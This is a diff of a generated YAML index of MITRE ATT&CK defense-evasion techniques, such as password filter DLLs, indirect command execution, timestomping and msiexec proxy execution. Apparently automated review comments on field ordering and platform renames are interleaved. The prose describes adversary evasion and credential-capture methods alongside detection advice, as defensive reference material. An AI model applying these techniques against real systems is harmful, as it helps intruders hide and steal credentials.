x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.009:
technique:
@@ -2785,11 +2852,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:27:04.900Z'
name: 'File and Directory Permissions Modification: Windows File and Directory
Permissions Modification'
description: |-
@@ -2850,12 +2916,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -2881,7 +2946,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -2923,7 +2988,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.007:
technique:
@@ -2965,7 +3029,7 @@ defense-evasion:
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated
policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:33:16.346Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Binary Proxy Execution: Msiexec'
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -2988,36 +3052,11 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.007
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -3041,22 +3080,44 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1070.007:
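Review bot: most of this T1556.002 hunk is key reordering rather than content change (`x_mitre_contributors`, `x_mitre_domains`, `x_mitre_platforms`, `external_references` and `object_marking_refs` move to new positions, and `url`/`external_id` swap order inside each reference), which buries the real changes: `x_mitre_version` 2.0 -> 2.1, `x_mitre_attack_spec_version` 2.1.0 -> 3.2.0, new `revoked`/`x_mitre_deprecated` flags, and removal of `x_mitre_permissions_required`. Suggest dumping keys in a fixed order (sorted keys in the YAML emitter) so future upstream syncs produce field-level diffs; the same reorder pattern appears below for T1202, T1070.006 and T1497.003.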
@@ -3131,7 +3192,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1600.001:
technique:
@@ -3157,7 +3217,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:36:22.369Z'
name: Reduce Key Space
description: |-
Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -3180,8 +3240,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.003:
technique:
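Review bot: for T1600.001 this hunk removes `x_mitre_attack_spec_version: 2.1.0` together with `spec_version`, leaving the object with no attack spec version at all, whereas the other objects in this diff keep or bump `x_mitre_attack_spec_version`. If the upstream object genuinely lacks the field that is fine, but any consumer reading `technique.x_mitre_attack_spec_version` must treat it as optional; the same removal happens for T1055.003 further down.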
@@ -3277,65 +3335,75 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.003
atomic_tests: []
T1202:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-03T14:47:17.154Z'
+ name: Indirect Command Execution
+ description: |-
+ Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
x_mitre_contributors:
- Matthew Demaske, Adaptforward
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+ such as Sysmon, for events such as process creations that include or are resulting
+ from parameters associated with invoking programs/commands/files and/or spawning
+ child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ x_mitre_defense_bypassed:
+ - Static File Analysis
+ - Application Control
type: attack-pattern
id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1202
url: https://attack.mitre.org/techniques/T1202
+ external_id: T1202
+ - source_name: Bleeping Computer - Scriptrunner.exe
+ description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+ tool to deploy malware. Retrieved July 8, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
- source_name: Evi1cg Forfiles Nov 2017
- url: https://twitter.com/Evi1cg/status/935027922397573120
description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
- January 22, 2018.
+ September 12, 2024.
+ url: https://x.com/Evi1cg/status/935027922397573120
- source_name: RSA Forfiles Aug 2017
- url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
(if you are watching for cmd.exe). Retrieved January 22, 2018.
+ url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+ - source_name: Secure Team - Scriptrunner.exe
+ description: Secure Team - Information Assurance. (2023, January 8). Windows
+ Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+ url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+ - source_name: SS64
+ description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+ url: https://ss64.com/nt/scriptrunner.html
- source_name: VectorSec ForFiles Aug 2017
- url: https://twitter.com/vector_sec/status/896049052642533376
description: vector_sec. (2017, August 11). Defenders watching launches of
- cmd? What about forfiles?. Retrieved January 22, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
- Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Indirect Command Execution
- x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
- such as Sysmon, for events such as process creations that include or are resulting
- from parameters associated with invoking programs/commands/files and/or spawning
- child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'Process: Process Creation'
- x_mitre_defense_bypassed:
- - Static File Analysis
- - Application Control
- x_mitre_attack_spec_version: 2.1.0
+ cmd? What about forfiles?. Retrieved September 12, 2024.
+ url: https://x.com/vector_sec/status/896049052642533376
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1202
atomic_tests: []
T1140:
@@ -3402,22 +3470,24 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1140
atomic_tests: []
T1562:
technique:
- modified: '2023-10-20T16:43:53.391Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Impair Defenses
- description: |-
+ description: |+
Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
- Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+ Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
- Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Jamie Williams (U ω U), PANW Unit 42
+ - Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.
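Review bot: the block scalar indicator for the T1562 description changes from `|-` to `|+`, so the parsed string now keeps its trailing newline(s) while every other description in this file is strip-chomped. That usually means the upstream description ends with extra newlines; consider normalizing trailing whitespace in the generator so description strings stay consistent across objects. The merged second paragraph and the added UNC3886 citation are fine as content.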
@@ -3426,15 +3496,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- IaaS
- Linux
- macOS
- Containers
- Network
- x_mitre_version: '1.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'File: File Modification'
- 'Cloud Service: Cloud Service Disable'
@@ -3472,15 +3544,17 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562
external_id: T1562
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Emotet shutdown
description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562
atomic_tests: []
T1055.003:
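Review bot: the new `Google Cloud Mandiant UNC3886 2024` reference has a description beginning with a leading space (`" Punsaen Boonyakarn, Shawn Chew, ...`), which is why the emitter fell back to double quotes for it. Trim it in the generator or upstream so the citation text matches the others. The removal of `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` at the bottom of this object is only a move (both are re-added earlier in the same object).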
@@ -3504,7 +3578,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -3552,13 +3626,11 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1036:
technique:
- modified: '2024-03-08T17:00:59.133Z'
+ modified: '2024-10-16T20:10:38.450Z'
name: Masquerading
description: |-
Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -3574,7 +3646,7 @@ defense-evasion:
- Felipe Espósito, @Pr0teus
- Elastic
- Bartosz Jerzman
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -3599,6 +3671,7 @@ defense-evasion:
- 'Process: Process Creation'
- 'Image: Image Metadata'
- 'Scheduled Job: Scheduled Job Metadata'
+ - 'User Account: User Account Creation'
- 'File: File Metadata'
- 'Scheduled Job: Scheduled Job Modification'
- 'Command: Command Execution'
@@ -3616,8 +3689,8 @@ defense-evasion:
external_id: T1036
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -3630,12 +3703,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036
atomic_tests: []
T1070.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:43:56.839Z'
name: 'Email Collection: Mailbox Manipulation'
description: "Adversaries may modify mail and mail application data to remove
evidence of their activity. Email applications allow users and other programs
@@ -3672,9 +3744,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'File: File Deletion'
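Review bot: `Office 365` and `Google Workspace` are removed from the T1070.008 platform list and replaced by `Office Suite` (with `x_mitre_version` 1.1 -> 1.2), and the T1562 hunk above adds `Identity Provider`. Any per-platform index files keyed on the old platform strings will silently lose this technique; check that those indexes are regenerated in the same change and that the platform-to-index mapping recognizes the new `Office Suite` and `Identity Provider` names.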
@@ -3712,14 +3783,13 @@ defense-evasion:
url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.008
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -3822,12 +3892,11 @@ defense-evasion:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -3911,7 +3980,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218:
technique:
@@ -3978,60 +4046,77 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218
atomic_tests: []
T1070.006:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Romain Dumont, ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
- type: attack-pattern
- created: '2020-01-31T12:42:44.103Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1070.006
- url: https://attack.mitre.org/techniques/T1070/006
- - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
- description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
- of Anti-Forensics Techniques. Retrieved June 3, 2016.'
- source_name: WindowsIR Anti-Forensic Techniques
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-30T15:14:56.021Z'
name: 'Indicator Removal on Host: Timestomp'
description: |-
- Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+ Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+ Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+ Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+ Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Romain Dumont, ESET
+ - Mike Hartley @mikehartley10
+ x_mitre_deprecated: false
x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
It may be possible to detect timestomping using file modification monitoring
that collects information on file handle opens and can compare timestamp values.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Process: OS API Execution'
- 'File: File Modification'
- 'File: File Metadata'
+ - 'Command: Command Execution'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_permissions_required:
- - root
- - SYSTEM
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+ created: '2020-01-31T12:42:44.103Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/006
+ external_id: T1070.006
+ - source_name: WindowsIR Anti-Forensic Techniques
+ description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+ of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+ url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+ - source_name: Inversecos Timestomping 2022
+ description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+ Detection – NTFS Forensics. Retrieved September 30, 2024.'
+ url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+ - source_name: Magnet Forensics
+ description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+ with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+ url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+ - source_name: Double Timestomping
+ description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+ ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+ url: https://x.com/matthewdunwoody/status/1519846657646604289
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1070.006
atomic_tests: []
T1620:
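Review bot: in the expanded Timestomp description, the retained final sentence (`Timestomping may be used along with file name [Masquerading]...`) follows the new double-timestomping paragraph without the blank line that separates the other paragraphs, so it will render as part of that paragraph; the `Double Timestomping` citation description also ends with `out there..` (doubled period). Both come from upstream text, so the fix belongs there rather than as a manual edit to a generated file. Dropping `x_mitre_permissions_required` and adding the `Process: OS API Execution` and `Command: Command Execution` data sources is consistent with the other objects in this diff that move to attack spec 3.2.0 (T1556.002 above).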
@@ -4134,9 +4219,76 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
